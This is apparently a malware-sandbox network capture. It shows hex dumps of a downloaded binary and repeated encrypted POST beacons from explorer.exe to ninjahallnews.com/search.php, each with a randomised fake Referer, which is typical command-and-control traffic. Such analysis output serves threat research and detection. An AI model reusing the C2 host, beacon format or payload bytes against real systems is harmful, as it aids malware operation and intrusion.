                                                                                                                                      2024-10-08 01:14:56 UTC8000INData Raw: 33 ff 89 78 04 8b 45 08 33 db 89 78 08 8b 45 08 43 89 78 0c f6 c1 10 74 0d 8b 45 08 09 58 04 c7 45 10 8f 00 00 c0 f6 c1 02 74 0e 8b 45 08 83 48 04 02 c7 45 10 93 00 00 c0 84 cb 74 0e 8b 45 08 83 48 04 04 c7 45 10 91 00 00 c0 f6 c1 04 74 0e 8b 45 08 83 48 04 08 c7 45 10 8e 00 00 c0 f6 c1 08 74 0e 8b 45 08 83 48 04 10 c7 45 10 90 00 00 c0 8b 75 0c 8b 0e 8b 45 08 c1 e1 04 f7 d1 33 48 08 83 e1 10 31 48 08 8b 0e 8b 45 08 03 c9 f7 d1 33 48 08 83 e1 08 31 48 08 8b 0e 8b 45 08 d1 e9 f7 d1 33 48 08 83 e1 04 31 48 08 8b 0e 8b 45 08 c1 e9 03 f7 d1 33 48 08 83 e1 02 31 48 08 8b 0e 8b 45 08 c1 e9 05 f7 d1 33 48 08 23 cb 31 48 08 e8 30 04 00 00 84 c3 74 07 8b 4d 08 83 49 0c 10 a8 04 74 07 8b 4d 08 83 49 0c 08 a8 08 74 07 8b 4d 08 83 49 0c 04 a8 10 74 07 8b 4d 08 83 49
                                                                                                                                      Data Ascii: 3xE3xECxtEXEtEHEtEHEtEHEtEHEuE3H1HE3H1HE3H1HE3H1HE3H#1H0tMItMItMItMI
                                                                                                                                      2024-10-08 01:14:56 UTC8000INData Raw: 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 f0 eb 05 83 64 95 f0 00 83 e9 04 4a 79 e9 8b 1d 8c c1 44 00 03 1d 78 c1 44 00 33 c0 40 e9 98 00 00 00 03 1d 8c c1 44 00 81 65 f0 ff ff ff 7f 8b c1 99 83 e2 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 42 83 65 d8 00 83 65 e0 00 83 ce ff 8b ca d3 e6 c7 45 dc 20 00 00 00 29 55 dc f7 d6 8b 4d e0 8b 7c 8d f0 8b cf 23 ce 89 4d d4 8b ca d3 ef 8b 4d e0 0b 7d d8 89 7c 8d f0 8b 7d d4 8b 4d dc d3 e7 ff 45 e0 83 7d e0 03 89 7d d8 7c d0 8b f0 6a 02 c1 e6 02 8d 4d f8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 f0 eb 05 83 64 95 f0 00 83 e9 04 4a 79 e9 33 c0 5e 6a 1f 59 2b 0d 84 c1 44 00 d3 e3 8b 4d c8 f7 d9 1b c9 81 e1 00 00 00 80 0b d9 8b 0d 88 c1 44 00 0b 5d f0 83 f9 40 75 0d 8b 4d cc 8b 55 f4 89 59 04 89 11 eb 0a 83 f9 20
                                                                                                                                      Data Ascii: Z+;|1tdJyDxD3@DeyJBeeE )UM|#MM}|}ME}}|jMZ+;|1tdJy3^jY+DMD]@uMUY
                                                                                                                                      2024-10-08 01:14:56 UTC8000INData Raw: 9d 04 00 da 9d 04 00 e8 9d 04 00 fc 9d 04 00 0a 9e 04 00 1c 9e 04 00 2a 9e 04 00 42 9e 04 00 56 9e 04 00 66 9e 04 00 72 9e 04 00 7c 9e 04 00 90 9e 04 00 a8 9e 04 00 b8 9e 04 00 ce 9e 04 00 e0 9e 04 00 f6 9e 04 00 06 9f 04 00 20 9f 04 00 34 9f 04 00 20 9d 04 00 5e 9f 04 00 74 9f 04 00 84 9f 04 00 9e 9f 04 00 ae 9f 04 00 c6 9f 04 00 d8 9f 04 00 f0 9f 04 00 04 a0 04 00 1a a0 04 00 28 a0 04 00 38 a0 04 00 46 a0 04 00 58 a0 04 00 6c a0 04 00 7c a0 04 00 8a a0 04 00 98 a0 04 00 a6 a0 04 00 ba a0 04 00 ce a0 04 00 e4 a0 04 00 f8 a0 04 00 0e a1 04 00 1c a1 04 00 2c a1 04 00 a4 9c 04 00 08 9d 04 00 f4 9c 04 00 dc 9c 04 00 ca 9c 04 00 b8 9c 04 00 48 9f 04 00 a4 a5 04 00 96 a5 04 00 82 a5 04 00 70 a5 04 00 60 a5 04 00 00 a2 04 00 10 a2 04 00 20 a2 04 00 28 a2 04 00
                                                                                                                                      Data Ascii: *BVfr| 4 ^t(8FXl|,Hp` (
                                                                                                                                      2024-10-08 01:14:56 UTC8000INData Raw: 61 74 69 63 20 74 68 72 65 61 64 20 67 75 61 72 64 27 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 64 79 6e 61 6d 69 63 20 61 74 65 78 69 74 20 64 65 73 74 72 75 63 74 6f 72 20 66 6f 72 20 27 00 00 00 00 60 64 79 6e 61 6d 69 63 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20
                                                                                                                                      Data Ascii: atic thread guard'`managed vector copy constructor iterator'`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh
                                                                                                                                      2024-10-08 01:14:56 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii:


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.44991523.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:19 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://emovkvrsbdl.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 234
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:19 UTC234OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 32 c2 19 9b a7 f2 23 03 cc 75 6a 83 5b e5 cb 34 65 cf 30 2c 78 ca da d1 68 ab ce 6e 51 f3 f0 61 a9 29 74 be 8b 05 64 4c 46 00 46 fb 10 d7 f4 9d 53 e5 e2 6b 64 24 e2 5c 2f ba 72 48 cc fb f2 c8 24 13 b5 0b da 45 8d 71 37 bd 55 8d 61 28 51 33 62 c1 bc 5f 93 89 04 e9 2a 65 c6 b6 de 3b be 9d 06 e6 d3 bf 9a 3d 64 c6 96 86 0a 3b b6 5c 55 fc 35 0c 00 f2 6a 67 6e f8 38 39 23 96 cc 8b 7b 5e b8 ef 66 fb 64 83 b7 db 66 08 01 37 df 65 3f 1f 0d 68 a7 23 9f ad 2b 38 01 50 1c b2
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[CLj4%<2#uj[4e0,xhnQa)tdLFFSkd$\/rH$Eq7Ua(Q3b_*e;=d;\U5jgn89#{^fdf7e?h#+8P
                                                                                                                                      2024-10-08 01:15:19 UTC294INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:19 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      2024-10-08 01:15:19 UTC7898INData Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 55 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
                                                                                                                                      Data Ascii: 1ee6U[!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
                                                                                                                                      2024-10-08 01:15:19 UTC18INData Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c
                                                                                                                                      Data Ascii: JMQF 82
                                                                                                                                      2024-10-08 01:15:19 UTC2INData Raw: 0d 0a
                                                                                                                                      Data Ascii:
                                                                                                                                      2024-10-08 01:15:19 UTC8192INData Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f
                                                                                                                                      Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
                                                                                                                                      2024-10-08 01:15:19 UTC6INData Raw: 97 20 09 6c 1a f8
                                                                                                                                      Data Ascii: l
                                                                                                                                      2024-10-08 01:15:19 UTC2INData Raw: 0d 0a
                                                                                                                                      Data Ascii:
                                                                                                                                      2024-10-08 01:15:19 UTC8192INData Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5
                                                                                                                                      Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
                                                                                                                                      2024-10-08 01:15:19 UTC6INData Raw: 60 4f 16 27 c7 be
                                                                                                                                      Data Ascii: `O'
                                                                                                                                      2024-10-08 01:15:19 UTC2INData Raw: 0d 0a
                                                                                                                                      Data Ascii:


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.44992423.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:20 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://qlmbybhxbuhwwks.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 315
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:20 UTC315OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 6d ab 0f be be cc 49 5b f0 14 66 f8 32 e8 83 03 7a ec 69 32 5b ae e0 94 7f d1 ef 0f 1d e6 e8 63 ea 6f 7c ac e7 52 67 66 45 59 23 c1 2e 80 eb c5 3a e3 82 31 13 26 ab 58 2e bc 66 0b 9f ed e8 97 5b 39 d3 69 e0 2d e8 3b 5d 9d 50 cc 2d 40 79 61 13 bb ab 49 f7 b3 3a 85 1d 2d f1 d6 87 55 ab ae 7e 93 ba ae a8 58 42 86 8a 86 6b 59 8c 7c 4a 98 11 7b 4a bd 26 12 2c a2 17 6a 12 fd db d5 20 3c b6 c9 69 bd 2d f7 c0 cc 7d 17 3c 4b e0 5b 72 70 52 7b e8 31 82 d3 15 3a 6a 7c 5e f0 8e 6e 60 0c 44 95 fc ee 24 96 e9 00 82 55 d0 f6 a8 c1 08 b2 5a
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lj4%<mI[f2zi2[co|RgfEY#.:1&X.f[9i-;]P-@yaI:-U~XBkY|J{J&,j <i-}<K[rpR{1:j|^n`D$UZ
                                                                                                                                      2024-10-08 01:15:21 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:21 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.44993523.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:21 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://dkjcfovkypdsnjsq.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 276
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:21 UTC276OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 4d f4 00 f9 b3 dc 38 40 c2 78 1f 88 69 9d f8 06 30 e1 1b 13 31 bd c7 9c 2b e2 fd 5c 70 c7 9b 72 f6 42 48 aa fe 15 09 32 41 31 1d ec 37 da f5 cb 03 d5 87 59 1a 2a f2 5a 5d a3 6e 50 80 93 e3 c2 00 3a dd 1e c7 59 e0 6d 78 aa 4f c1 55 4a 76 61 1b bc f9 6c a4 90 27 85 5c 03 fb c5 ba 27 a7 81 58 aa c1 a8 80 33 79 c9 84 b1 40 0e 8e 73 42 d6 7e 74 2b f8 7c 0a 2b b2 1b 76 26 dc c1 ce 1f 7f a4 ea 7d bd 2c 85 bc c1 7c 78 23 6e e4 5d 2d 06 3a 70 c5 0f e2 9d 30 02 30 2f 51 ee f0 4a 23 4b 43 d8 ee f4 21 fd d0 15 ed 55 b7 f6 bd a5 49 a8 47
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lk4%<M8@xi01+\prBH2A17Y*Z]nP:YmxOUJval'\'X3y@sB~t+|+v&},|x#n]-:p00/QJ#KC!UIG
                                                                                                                                      2024-10-08 01:15:22 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:22 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.44994223.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:23 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://ifvxyamcogdoh.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 324
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:23 UTC324OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 24 a3 0c fe 97 a1 16 58 be 2d 32 ef 3b 8a d2 66 04 b3 36 4d 6f a8 f6 d6 6b b5 d7 58 10 80 fa 43 8a 5e 76 bb fe 7e 3c 39 77 4f 17 f4 1c 90 9a 9c 4b 90 b7 44 61 52 ee 79 31 d4 2e 18 de 82 93 92 38 74 b0 73 ba 43 be 30 2b a8 24 ce 2a 37 63 15 0a a5 d3 12 fd 88 69 e9 22 3f f8 ca dd 23 a2 90 61 e9 c2 ee b5 47 5f 86 ab b3 1a 13 ab 03 08 96 79 6e 10 92 6a 2c 4a df 22 60 54 80 84 d3 22 27 89 e4 1b 8c 3b fb e3 b0 13 2a 2a 2a ef 78 25 74 4b 21 a3 3d e4 ba 10 02 7b 2c 54 fb e2 7d 6c 52 3f 85 c8 9c 55 98 d6 29 91 52 b7 95 e9 af 69 91 79
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Li4%<$X-2;f6MokXC^v~<9wOKDaRy1.8tsC0+$*7ci"?#aG_ynj,J"`T"';***x%tK!={,T}lR?U)Riy
                                                                                                                                      2024-10-08 01:15:23 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:23 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.44995123.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:24 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://jhsgrosrfeyc.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 227
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:24 UTC227OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 20 bf 3b f7 df e4 3a 1e d6 12 27 a5 45 9b 8a 7c 2d e9 15 54 28 9c c9 d3 39 db f2 65 74 f9 f9 23 e8 2c 29 f5 d1 17 13 53 09 5a 21 f8 34 dc ee ab 2c ec e7 69 19 26 9a 0f 59 f2 72 51 ff db e9 97 13 6a 97 53 b8 64 ed 6f 2e c7 5c b1 2a 53 50 12 0a a8 f6 51 ee 87 08 e7 1c 0f 9e b4 86 4f b7 e6 41 84 df 82 82 3d 3b ad b3 98 15 48 b9 72 51 93 62 43 1a ee 49 71 25 a9 13 13 2a 96 d6 9e 0c 7e a4 d0 33 84 7a 82 be a7 25 67 00 29 e5 15 65 03 4a 0f be 15 de
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Ln4%< ;:'E|-T(9et#,)SZ!4,i&YrQjSdo.\*SPQOA=;HrQbCIq%*~3z%g)eJ
                                                                                                                                      2024-10-08 01:15:24 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:24 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.44995923.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:24 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://snwbetxwxfjxjjcj.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 213
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:24 UTC213OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 3c c4 1d a0 bb a7 11 45 d5 12 3f 9d 3a c3 87 74 6a d2 10 50 34 c3 c2 d9 29 df ef 5c 55 9d 80 59 b2 60 33 ad 9c 56 6d 4a 02 3c 1a e5 74 d1 f7 97 0e ed 9a 4c 6b 57 e1 4d 48 ca 47 06 c3 fe ac b9 02 1f a7 11 b0 3f ff 3f 5b d8 04 d5 55 41 3c 7d 77 cd bd 12 93 87 1a 9f 21 6d ca cc bc 25 d2 bc 74 f2 b7 94 83 5b 4b 85 cd b4 1a 51 81 7b 12 8d 0b 01 3e b9 6f 75 7c a4 36 7b 53 8e c3 95 25 34 9a b4 15 f6 29 fd 90
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lo4%<<E?:tjP4)\UY`3VmJ<tLkWMHG??[UA<}w!m%t[KQ{>ou|6{S%4)
                                                                                                                                      2024-10-08 01:15:25 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:25 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.44996523.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:25 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://duxssctxidfvcwn.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 321
                                                                                                                                      Host: ninjahallnews.com
